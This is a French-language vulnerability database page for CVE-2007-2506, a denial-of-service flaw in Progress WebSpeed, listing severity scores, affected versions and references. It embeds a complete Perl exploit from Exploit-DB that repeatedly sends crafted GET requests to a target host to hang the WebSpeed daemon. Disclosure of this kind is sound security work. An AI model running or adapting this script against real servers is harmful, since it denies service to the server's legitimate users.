CVE-2007-2506 : Détail

CVE-2007-2506

6.2%V3
Network
2007-05-03
23h00 +00:00
2018-10-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

WebSpeed 3.x in OpenEdge 10.x in Progress Software Progress 9.1e, and certain other 9.x versions, allows remote attackers to cause a denial of service (infinite loop and daemon hang) via a messenger URL that invokes _edit.r with no additional parameters, as demonstrated by requests for cgiip.exe or wsisa.dll with WService=wsbroker1/_edit.r in the PATH_INFO.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 29943

Date de publication : 2007-05-01 22h00 +00:00
Auteur : Eelko Neven
EDB Vérifié : Yes

//source: https://www.securityfocus.com/bid/23778/info // //WebSpeed is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. // //Successful exploits can allow attackers to cause the application to become unresponsive, denying service to legitimate users. if(!$ARGV[0]){ print "U.LP.O.W\n"; print "www.ulpow.net\n"; print "The Eliminators of the Web\n"; print "Usage:perl webspeed.pl targetsite targetpage\n"; } else { $site = $ARGV[0]; $page = $ARGV[1]; print "Attack Started\n"; $ish=1; do { $ish++; use IO::Socket; $socket = new IO::Socket::INET( PeerAddr => $site, PeerPort => 80, Proto => 'tcp', Type => SOCK_STREAM, ) or die "Couldn't Connect to target please check again address!\n"; print $socket "GET $page HTTP/1.0\r\n"; close($socket); } while ($ish < 1000); print ":-; Attack Complete\n"; }

Products Mentioned

Configuraton 0

Progress>>Progress >> Version 9.1e

    Progress>>Webspeed >> Version 3.0

    Progress>>Webspeed >> Version 3.1a

    Progress>>Webspeed >> Version 3.1d

    Progress>>Webspeed >> Version 3.1e

    Références

    http://www.securityfocus.com/bid/23778
    Tags : vdb-entry, x_refsource_BID
    http://www.ishare.nl/
    Tags : x_refsource_MISC
    http://osvdb.org/35541
    Tags : vdb-entry, x_refsource_OSVDB
    http://secunia.com/advisories/25129
    Tags : third-party-advisory, x_refsource_SECUNIA